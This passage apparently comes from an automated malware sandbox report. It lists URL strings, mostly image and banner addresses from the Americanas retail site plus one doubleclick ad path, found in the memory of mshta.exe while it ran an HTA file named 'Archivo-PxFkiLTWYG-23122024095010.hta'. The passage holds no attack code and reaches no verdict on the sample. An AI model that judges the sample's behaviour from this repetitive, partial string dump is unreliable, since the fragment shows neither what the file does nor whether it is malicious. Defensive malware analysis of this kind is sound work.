00000000.00000002.2774601657.000000000A9AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653785457.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2770501729.00000000092AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2770024098.0000000009210000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2748206078.000000000C26F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A9BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2647607902.000000000C288000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2544825799.0000000006524000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2546345644.000000000651E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2543401774.0000000006527000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744380912.000000000336C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2542970365.0000000006524000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656547873.000000000336A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2750683255.0000000003370000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io
Source: mshta.exe, 00000000.00000003.2749376863.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744061643.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2766066780.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2764898433.00000000033C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/catalog-statics/acom/favicon-americanas.ico(
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2714640345.0000000009A55000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A95D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2533852956.000000000DD39000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2705493492.0000000009A54000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/produtos/01/00/img3/13439422/9/1343942201G1.jpg
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A95D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2533852956.000000000DD39000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/produtos/01/00/img3/13439422/9/1343942201P.jpg
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A95D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2533852956.000000000DD39000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/produtos/01/00/img3/13439422/9/1343942201P1.jpg
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A95D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2533852956.000000000DD39000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/produtos/01/00/img3/13439422/9/1343942201_1GG.jpg
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A95D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/produtos/01/00/img3/13439422/9/1343942201_1SZ.jpg
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A95D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2721734384.0000000009A9B000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2533852956.000000000DD39000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2642469328.0000000009A9B000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2721704677.00000000099A0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/produtos/5008766730/imagens/bicicleta-aro-24-kls-sport-gold-freio-v
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2721112654.0000000009A5B000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2713051987.0000000009A82000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A95D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2705594806.0000000009A81000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2533852956.000000000DD39000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2700261943.0000000009A5A000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2720623754.0000000009A83000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/produtos/5271512690/imagens/fritadeira-air-fryer-philco-chrome-5-5-
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2721112654.0000000009A5B000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A95D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2720487423.0000000009544000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2533852956.000000000DD39000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2720828372.000000000952A000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2714336244.0000000009543000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2700261943.0000000009A5A000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/produtos/60405799/imagens/ck-be-calvin-klein-eau-de-toilette-perfum
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A95D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2533852956.000000000DD39000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/produtos/7211551574/imagens/sunga-masculina-adidas-3-listras/721155
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2642469328.0000000009A93000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A95D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2722183496.0000000009A2B000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2705745448.0000000009A94000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2714640345.0000000009A57000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2533852956.000000000DD39000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2647190695.0000000009A2A000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2722235544.0000000009A95000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2705493492.0000000009A57000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/produtos/7503637854/imagens/conjunto-com-40-bolas-de-4cm-vermelha-e
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2721112654.0000000009A5B000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A95D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2533852956.000000000DD39000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2700261943.0000000009A5A000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/produtos/7510984342/imagens/cordao-300-leds-30-metros-8-funcoes-bra
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666836298.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670350202.000000000A856000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670136845.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2750136023.00000000092C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2542653121.000000000659B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2771021484.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2543257881.000000000659C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2764615643.00000000092CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2534072196.0000000006591000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657306854.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751843809.00000000092CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744500179.00000000092C7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2542992354.000000000659C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2021/03/05/americanassocial_app.png
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2661257377.00000000093CA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653785457.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751738546.000000000935D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653785457.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2534072196.0000000006591000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670320438.000000000935A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670707153.00000000092B3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2765606681.0000000003361000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2658032255.00000000092B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2677175292.000000000935B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660098388.0000000003361000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2022/04/05/App-15b552bb657a.png
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670350202.000000000A87C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664940461.00000000093B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2772100906.00000000093BF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2676815165.000000000AA24000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744826440.000000000AA29000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2669695737.00000000093B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652668755.000000000AA1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2750307387.000000000AA36000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668949528.000000000AA1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650675847.000000000A9FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2748068401.000000000A87C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774035249.000000000A87C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653785457.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2676562635.000000000AA1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2775048754.000000000AA39000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2022/04/08/thumbnail_BannerAPP_07-04-3ef281a2ba9f.jpg
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2676815165.000000000AA24000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744826440.000000000AA29000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2750136023.00000000092C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652668755.000000000AA1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668949528.000000000AA1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2775010969.000000000AA2A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650675847.000000000A9FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2764615643.00000000092CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657306854.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751843809.00000000092CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2676562635.000000000AA1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744500179.00000000092C7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2022/07/15/_informatica-a6061b57bcbc.png
Source: mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2769831858.0000000006F1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774829877.000000000A9E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2728492044.000000000A9E8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665163522.0000000006EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2748531062.0000000006F1D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2750750982.000000000928C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727304462.000000000928A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654777564.0000000006EF2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648570503.0000000006EEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657340693.00000000092CE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657306854.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667279344.00000000092D5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2022/08/01/LG-Agosto-01082022_americanas-home-banner-TT
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666836298.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670136845.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664288455.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2771882158.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665163522.0000000006EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2764767166.0000000006EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656004921.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653785457.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727644987.00000000093AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654777564.0000000006EF2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648570503.0000000006EEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657340693.00000000092CE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657306854.00000000092B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2022/12/07/291422413_392978049367464_116978390465635854
Source: mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2658796254.0000000003382000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656547873.0000000003382000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2769831858.0000000006F1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2713051987.0000000009A82000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774829877.000000000A9E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2770582217.00000000092B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2728492044.000000000A9E8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2748309575.0000000003385000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665163522.0000000006EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2748531062.0000000006F1D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2705594806.0000000009A81000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654777564.0000000006EF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/04/27/Samsung-1P-Abril-Contrato-RJ_americanas-home
